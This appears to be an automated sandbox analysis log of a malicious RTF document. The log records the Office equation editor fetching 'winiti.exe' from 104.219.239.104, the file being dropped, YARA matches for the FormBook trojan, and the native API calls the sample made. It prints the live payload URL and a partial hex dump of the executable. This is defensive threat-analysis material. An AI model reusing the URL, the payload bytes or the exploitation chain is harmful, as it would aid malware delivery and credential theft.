Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 26 Jul 2024 11:43:07 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30Last-Modified: Tue, 16 Jul 2024 19:13:36 GMTETag: "e8400-61d6224798859"Accept-Ranges: bytesContent-Length: 951296Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 60 c6 96 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 78 0e 00 00 0a 00 00 00 00 00 00 1e 96 0e 00 00 20 00 00 00 a0 0e 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 0e 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 c9 95 0e 00 4f 00 00 00 00 a0 0e 00 18 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 0e 00 0c 00 00 00 28 6d 0e 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 24 76 0e 00 00 20 00 00 00 78 0e 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 18 06 00 00 00 a0 0e 00 00 08 00 00 00 7a 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 0e 00 00 02 00 00 00 82 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fd 95 0e 00 00 00 00 00 48 00 00 00 02 00 05 00 04 05 01 00 4c 55 00 00 03 00 00 00 49 00 00 06 50 5a 01 00 d8 12 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a6 02 16 7d 02 00 00 04 02 72 01 00 00 70 7d 03 00 00 04 02 14 7d 05 00 00 04 02 28 15 00 00 0a 00 00 02 28 0f 00 00 06 00 2a c2 02 16 7d 02 00 00 04 02 72 01 00 00 70 7d 03 00 00 04 02 14 7d 05 00 00 04 02 28 15 00 00 0a 00 00 02 28 0f 00 00 06 00 02 03 7d 01 00 00 04 2a 00 1b 30 03 00 82 00 00 00 01 00 00 11 00 14 0a 00 72 03 00 00 70 73 16 00 00 0a 0a 06 6f 17 00 00 0a 00 72 ba 00 00 70 0b 07 06 73 18 00 00 0a 0c 73 19 00 00 0a 0d 08 73 1a 00 00 0a 13 04 11 04 09 6f 1b 00 00 0a 26 02 09 6f 1c 00 00 0a 16 6f 1d 00 00 0a 7d 04 00 00 04 02 7b 06 00 00 04 02 7b 04 00 00 04 6f 1e 00 00 0a 00 00 de 13 13 05 00 11 05 6f 1f 00 00 0a 28 20 00 00 0a 26 00 de 00 de 0a 00 06 6f 21 00 00 0a 00 00 dc 2a 00 00 01 1c 00 00 00 00 03 00 5f 62 00 13 20 00 00 01 02 00 03 00 74 77 00 0a 00 00 00 00 13 30 04 00 c2 00 00 00 02 00 00 11 00 02 7b 07 00 00 04 72 01 00 00 70 6f 22 00 00 0a 00 02 7b
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 104.219.239.104 104.219.239.104
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: DATAWAGONUS DATAWAGONUS
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /80/winiti.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 104.219.239.104Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 104.219.239.104
Source: unknown TCP traffic detected without corresponding DNS query: 104.219.239.104
Source: unknown TCP traffic detected without corresponding DNS query: 104.219.239.104
Source: unknown TCP traffic detected without corresponding DNS query: 104.219.239.104
Source: unknown TCP traffic detected without corresponding DNS query: 104.219.239.104
Source: unknown TCP traffic detected without corresponding DNS query: 104.219.239.104
Source: unknown TCP traffic detected without corresponding DNS query: 104.219.239.104
Source: unknown TCP traffic detected without corresponding DNS query: 104.219.239.104
Source: unknown TCP traffic detected without corresponding DNS query: 104.219.239.104
Source: unknown TCP traffic detected without corresponding DNS query: 104.219.239.104
Source: unknown TCP traffic detected without corresponding DNS query: 104.219.239.104
Source: unknown TCP traffic detected without corresponding DNS query: 104.219.239.104
Source: unknown TCP traffic detected without corresponding DNS query: 104.219.239.104
Source: unknown TCP traffic detected without corresponding DNS query: 104.219.239.104
Source: unknown TCP traffic detected without corresponding DNS query: 104.219.239.104
Source: unknown TCP traffic detected without corresponding DNS query: 104.219.239.104
Source: unknown TCP traffic detected without corresponding DNS query: 104.219.239.104
Source: unknown TCP traffic detected without corresponding DNS query: 104.219.239.104
Source: unknown TCP traffic detected without corresponding DNS query: 104.219.239.104
Source: unknown TCP traffic detected without corresponding DNS query: 104.219.239.104
Source: unknown TCP traffic detected without corresponding DNS query: 104.219.239.104
Source: unknown TCP traffic detected without corresponding DNS query: 104.219.239.104
Source: unknown TCP traffic detected without corresponding DNS query: 104.219.239.104
Source: unknown TCP traffic detected without corresponding DNS query: 104.219.239.104
Source: unknown TCP traffic detected without corresponding DNS query: 104.219.239.104
Source: unknown TCP traffic detected without corresponding DNS query: 104.219.239.104
Source: unknown TCP traffic detected without corresponding DNS query: 104.219.239.104
Source: unknown TCP traffic detected without corresponding DNS query: 104.219.239.104
Source: unknown TCP traffic detected without corresponding DNS query: 104.219.239.104
Source: unknown TCP traffic detected without corresponding DNS query: 104.219.239.104
Source: unknown TCP traffic detected without corresponding DNS query: 104.219.239.104
Source: unknown TCP traffic detected without corresponding DNS query: 104.219.239.104
Source: unknown TCP traffic detected without corresponding DNS query: 104.219.239.104
Source: unknown TCP traffic detected without corresponding DNS query: 104.219.239.104
Source: unknown TCP traffic detected without corresponding DNS query: 104.219.239.104
Source: unknown TCP traffic detected without corresponding DNS query: 104.219.239.104
Source: unknown TCP traffic detected without corresponding DNS query: 104.219.239.104
Source: unknown TCP traffic detected without corresponding DNS query: 104.219.239.104
Source: unknown TCP traffic detected without corresponding DNS query: 104.219.239.104
Source: unknown TCP traffic detected without corresponding DNS query: 104.219.239.104
Source: unknown TCP traffic detected without corresponding DNS query: 104.219.239.104
Source: unknown TCP traffic detected without corresponding DNS query: 104.219.239.104
Source: unknown TCP traffic detected without corresponding DNS query: 104.219.239.104
Source: unknown TCP traffic detected without corresponding DNS query: 104.219.239.104
Source: unknown TCP traffic detected without corresponding DNS query: 104.219.239.104
Source: unknown TCP traffic detected without corresponding DNS query: 104.219.239.104
Source: unknown TCP traffic detected without corresponding DNS query: 104.219.239.104
Source: unknown TCP traffic detected without corresponding DNS query: 104.219.239.104
Source: unknown TCP traffic detected without corresponding DNS query: 104.219.239.104
Source: unknown TCP traffic detected without corresponding DNS query: 104.219.239.104
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{A14C26B1-EEA7-4E1B-A080-B2F59643795F}.tmp Jump to behavior
Source: global traffic HTTP traffic detected: GET /80/winiti.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 104.219.239.104Connection: Keep-Alive
Source: EQNEDT32.EXE String found in binary or memory: http://104.219.239.104/80/winiti.exe
Source: EQNEDT32.EXE, 00000002.00000002.359904925.000000000065F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://104.219.239.104/80/winiti.exeRea
Source: EQNEDT32.EXE, 00000002.00000002.359904925.000000000065F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://104.219.239.104/80/winiti.exej
Source: EQNEDT32.EXE, 00000002.00000002.359904925.000000000065F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://104.219.239.104/80/winiti.exekkC:
Source: EQNEDT32.EXE, 00000002.00000002.359904925.000000000065F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://104.219.239.104/80/winiti.exez

E-Banking Fraud
barindex
Yara detected FormBook
Source: Yara match File source: 6.2.winiti.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.winiti.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000002.453259452.0000000000140000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.453324257.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: DzokrPQPdy.rtf, type: SAMPLE Matched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
Source: 6.2.winiti.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 6.2.winiti.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000006.00000002.453259452.0000000000140000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000006.00000002.453324257.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\winiti[1].exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Roaming\winiti.exe Jump to dropped file
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Memory allocated: 770B0000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe Memory allocated: 770B0000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe Memory allocated: 770B0000 page execute and read and write Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Memory allocated: 770B0000 page execute and read and write Jump to behavior
Contains functionality to call native functions
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_0042BEE3 NtClose, 6_2_0042BEE3
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00D807AC NtCreateMutant,LdrInitializeThunk, 6_2_00D807AC
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00D7F9F0 NtClose,LdrInitializeThunk, 6_2_00D7F9F0
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00D7FAE8 NtQueryInformationProcess,LdrInitializeThunk, 6_2_00D7FAE8
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00D7FB68 NtFreeVirtualMemory,LdrInitializeThunk, 6_2_00D7FB68
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00D7FDC0 NtQuerySystemInformation,LdrInitializeThunk, 6_2_00D7FDC0
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00D800C4 NtCreateFile, 6_2_00D800C4
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00D80048 NtProtectVirtualMemory, 6_2_00D80048
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00D80078 NtResumeThread, 6_2_00D80078
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00D80060 NtQuerySection, 6_2_00D80060
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00D801D4 NtSetValueKey, 6_2_00D801D4
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00D8010C NtOpenDirectoryObject, 6_2_00D8010C
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00D80C40 NtGetContextThread, 6_2_00D80C40
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00D810D0 NtOpenProcessToken, 6_2_00D810D0
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00D81148 NtOpenThread, 6_2_00D81148
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00D7F8CC NtWaitForSingleObject, 6_2_00D7F8CC
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00D7F900 NtReadFile, 6_2_00D7F900
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00D81930 NtSetContextThread, 6_2_00D81930
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00D7F938 NtWriteFile, 6_2_00D7F938
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00D7FAD0 NtAllocateVirtualMemory, 6_2_00D7FAD0
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00D7FAB8 NtQueryValueKey, 6_2_00D7FAB8
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00D7FA50 NtEnumerateValueKey, 6_2_00D7FA50
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00D7FA20 NtQueryInformationFile, 6_2_00D7FA20
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00D7FBE8 NtQueryVirtualMemory, 6_2_00D7FBE8
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00D7FBB8 NtQueryInformationToken, 6_2_00D7FBB8
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00D7FB50 NtCreateKey, 6_2_00D7FB50
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00D7FC90 NtUnmapViewOfSection, 6_2_00D7FC90
